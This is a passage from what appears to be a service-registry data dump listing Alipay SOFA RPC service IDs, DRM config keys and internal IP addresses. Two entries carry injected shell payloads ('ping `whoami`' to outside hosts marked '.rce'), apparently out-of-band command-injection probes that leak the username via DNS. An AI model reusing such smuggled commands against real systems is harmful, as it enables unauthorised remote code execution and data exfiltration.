IopFlowAnalysisMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.beacon.common.service.facade.fund.decide.FundDecideFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.irisk.UniformVariableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodcore.service.api.service.ServicePartnerQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.biz.appointment.LotteryAppointmentService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchmembercore.common.service.facade.relation.instance.RelationOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.reading.common.service.facade.game.QuestionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetFluxService:1.0:mtmallcard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-dcepcoin-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.tradequery.common.service.facade.TradeRefundQueryFacade:1.0:tradequeryhis@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kgopen.common.sdk.infra.appinfo.AppInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.213.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","config:com.alipay.imif.common.service.facade.api.MerchantCertificateQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:oceanbasecapacity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.test.SimpleService-17#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pvsofaclient.facade.rest.service.facade.rpc.route.viponly.VipOnlyRouteRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_30.30.197.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mapi.facade.partner.PartnerExterfaceExtraParamFacade:1.0:mapitool@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_DISCOUNT#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.bankcard.facade.ValidateRecordQueryServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insptmarket.facade.consultant.api.ConsultantReportCleanServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zskynet:name=com.alipay.common.tracer.manage.TracerDrm.zdalOtsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcloanrepay.common.service.facade.service.support.ForceRepayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:dqsyncguard@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.50.28.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditmerchant.service.facade.SettlementAccountManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundboss.common.service.facade.risk.QueryTableCoverageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.66.24#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mservicesinspect.biz.shared.inspect.process.DistributeTaskRequestReceiver:1.0:obeliskReceiverProcessClient@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:ping `whoami`GIYHU5BSMQWTC5LVPJRW2LLVNZUXC5LFJFSC2ZBZOM3WY6LBOE------.rce.scan.noble.dn5l0g.co@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.bkgwlite.common.service.facade.test.TransSendTestService:1.0:bkgwlite@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openapi.common.service.client.SysAppInvokeService:1.0:scardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeduct.common.service.facade.agreement.AuthorizationServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransVoucherFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.122.29#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_CLOANCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_C_MINIPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_11.124.174.141#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.84.73#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imasp.common.service.facade.ScenePointService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yebplus.common.facade.service.api.baobei.api.BBContractService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.management.VerifyCommonQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-zeroxrisk-concurrent-analyze#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finbatchcore.common.service.facade.spi.OfdTransactionConfirmSpi:1.0:bank.financing@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.alp.facade.PredictValueFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.124.80#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.88.200#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Servers_TP_G_MOBILE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antgraph.facade.GeaBaseExplorerManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.slaErrorCodeSet,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tradecsa.common.service.facade.mutualtask.MutualtaskHealthCheckFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.monitor.drm.zappinfo.zappinfo_ds.switcher,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.clivemng.common.service.facade.api.plan.SchedulePlanUserService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cscheck.service.facade.api.GeneralQcResultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.core.service.migrate.faasst.cache.FaAssetRouteInvokeCache:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.interfaces.endpoint.facade.rest.tbase.TBaseHandleServerFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acmcscore.facade.ChangeNoticeRangeFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservice.common.service.facade.api.workflow.WorkflowProductInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.prodcenter.common.service.facade.query.api.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.mybank.bkloandecision.service.facade.agds.RepayDrivenService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.UserDonateInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.api.MessageManageApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.dwalm.facade.api.FmQuotaDataQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ifxposition.service.facade.instrument.FxInstrumentManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.datasecurity.interfaces.facade.api.desensitization.SecurityDesensitizeService:1.0:datasecurity@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_O_CIF#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.BizFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.pcx.service.AppointmentGoalFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finasmcore.common.service.facade.promo.service.PromoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.paramCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.settlecore.service.facade.deposit.DataAdapterService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP_C_LINEPAY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.sofa.rpc.elastic.ElasticService:1.0:bkinstportal@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:mdeduct_GRZONE@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.36.25.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.scardcenter.common.service.facade.test.ExecuterTest:1.0:expiredTradeCheckExecuter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.ptcore.common.service.facade.api.catalog.BusinessCatalogConfigFacade:1.0:PDCORE_ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.airbops.biz.changemng.drm.ChangemngDrmConfig.accessToken,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.fraudmng:name=com.alipay.cif.client.drm.CifQueryLocalCacheSwitcher.expire,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ucdpmng.facade.UcdpMaterialFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.salesmng.common.service.facade.merchant.api.CrmMerchantCommonService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antlbs.facade.promo.PromoMatchFacade:2.0.2.20180901@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundselling.common.service.appointment.AppointmentConfFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcreditcore.common.service.facade.ZmCreditNegativeBizFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_FINLINKBOSS#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.80.93#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.charge.service.bizfee.facade.ChargeApplyServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudlego.common.service.facade.CloudlegoServiceGrayPublishFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.agdsSellerWhiteListTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.lendpofprod:name=com.alipay.zcache.tbase.loadTestZdatabusTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.maxHoldAmount,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.orderlink.ArAdjustService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.accustomercore.common.service.facade.identity.MemberServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigQueryService:1.0:finbaservice@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudprovision:name=com.alipay.cloudprovision.conf.requestconfig.dockerClientConnectTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.minicenter.common.service.facade.api.data.MiniDataAuthMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.postmen.api.PushMigrationApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.205.11#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:auditFinishExecutor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INFOSEC#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.receipt.api.PayReceiptService:1.0:http://payrouter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imasp.common.service.facade.ConfigInfoServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scheduler.biz.shared.handler.SchedulerTaskPubFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileacauth.service.metaInfo.facade.DeviceMetaInfoManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_G_CHANNELROUTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.25.213#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.airbops.service.common.proxy.mapitool.facade.ProxyExterfaceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.InsuranceToolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.overseaprod.common.service.fundentry.FundLogFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifinfluxConf:name=com.alipay.fc.comparacenter.confscript.VersionControl.version,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.83.128.175#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.158.88.231#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.imaspmng.common.service.facade.CycleCardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.malgo.common.facade.OraRerankFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.InterfaceBackGroundManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsTempManager.contentTimeFilterOpenSceneSetStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antinvoice.common.service.facade.api.EinvFileFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityexprod.biz.lisa.service.reversepayment.EntRevPayInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finriskeventseek.common.service.integration.staragent.KmiClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.fingiftprodTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.bizprodmng:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.customServiceGroup,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.mif.common.service.facade.MerchantContactWayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppStatusInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cashiercore.service.facade.api.CashiercorePayService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:sandboxExperimentCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfcenter.common.service.facade.ArRefundPayQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.pam.PamNamelistFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:instoperation@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.bizprodmng:name=com.alipay.cif.model.cache.CifCOControlSwitch.checkArgConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundbankcore.common.service.facade.FundBankNoTradeOutFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.84.89#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.publictest.facade.feedBack.XiaoBaoServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcardcore.common.service.facade.mpcard.McardPaymentFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.94.105#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cloudengine:name=com.alipay.cloudengine.resmanager.lifemng.resValue,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_agdsdatahub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.katongprod.signcenter.service.read.SignDataQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.UcaMigrateDrm.loadTaskType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.120.33#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCompanyManager.companyConfCacheVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@finpromoscene#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","config:com.alipay.alinp.common.service.facade.idmapping.IdMappingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.riskmng:name=com.alipay.zdal.ldc.tair.bankcardTairCache.cacheEngineUrl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appxagg.common.service.facade.api.management.community.CommunityServiceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.taskcenter.common.service.facade.callback.Callback:1.0.0:pointmngPointTaskCenterCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paymentmng.service.facade.limit.RuleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.DownloadFileFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.certifycenter.service.facade.verify.UserWithdrawManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socplt.common.service.facade.IndicatorServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmng.common.validate.spi.SpiValidateFacade:1.0:test@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerops.facade.api.SiteManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_KBDISH#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.client.api.KmiClientApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.13.140.2#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bbccore.facade.promocamp.PromoCampFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openinsight.common.service.facade.meddle.api.MeddleManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.232.96#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.insrenewprod.common.service.facade.api.continuous.InsContinuousFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.ap.cashier.common.service.facade.api.RefundService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.zcbsalescenter.biz.shared.repository.ProductTemplateRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_INTEGRATIONTEST#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mfinsnsprod.biz.service.open.gw.community.api.OpenSecuUserGWManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.oceanbase.obforumcore.service.common.OperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.service.spi.DataArrangeService:1.0:fincommontaskhub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zprodqueryTairCache_dest.useKeyRouteInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openitemcore.common.service.facade.api.management.selection.SelectionMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:expMngProcessCallbackImpl_explab@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:gfsettleprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.shopservice.ShopServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:gzmshmp-leverapi#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.publiccore.common.service.facade.account.OfficialAccountOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.activity.LifeActivityAwardQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unimetaservice.resource.facade.ResourceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.heralib.service.facade.api.ComputeStoreServiceFacade:1.0:zdatacontext@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.kbpayment.aggpay.gateway.facade.api.AggPayGatewayFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finmobilemarket.common.service.facade.api.JCMSRuleFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.shop.ShopQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.routeclient.interfacename:sffgroup-dceplubanweb#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.smartscene.common.facade.ScardRecommendService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.imaspmng.common.service.facade.CodeRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.detect.DetectItemCheck:1.0:resConsumptionDetectItemCheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchorder.common.service.facade.consumerecord.ConsumeRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ordermng:name=com.alipay.common.tracer.manage.TracerDrm.zdalOssDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:antfin.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.bumng.common.service.facade.RoleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.paymentPeakQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","config:com.alipay.appxcore.common.service.facade.api.servicelibrary.ServiceLibraryQueryNgFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.alinode:name=com.alipay.routeclient.DefaultRouteCoordinator.status,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bizsolcommon.member.spi.facade.RefundCheckServiceFacade:1.0:membersolution@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.atd:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.asyncGetVipDomainsIntervalMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alibaba.dt.onedata.dwm.client.sync.meta.SyncMetadataOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanbenefit.common.service.facade.beike.BeikeAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:inststub@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.xtrans.AssetFinalizeService:1.0:pcreditauthasset@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:govbizprodsys@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.einvoice.prod.facade.service.EinvoiceApplyService:1.0@tri#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.ambush.netmock.rule.NetmockRuleCoordinator.netmockRule,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:;ping `whoami`86842598-80102053-uniqueId-104003033.rce.noble.log.lynnshare.cc;@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.video.VideoSceneConfigFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securitydata.common.service.facade.network.NetworkPlatFormAnalyzeQueryService:1.0:securitydatacbackend@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.recommend.LifeMsgCheckInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promomng.common.service.facade.workbench.DatabusProcessService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.MiniAuditNodeProcessFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:gfas@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zcbsalescenter.common.service.facade.trade.UserPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.consult.api.AssetConsultService:1.0:asyncAsttshipcoreFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.peerpay.prod.common.service.facade.api.account.JointAccountBillQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_30.73.27.71#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finadv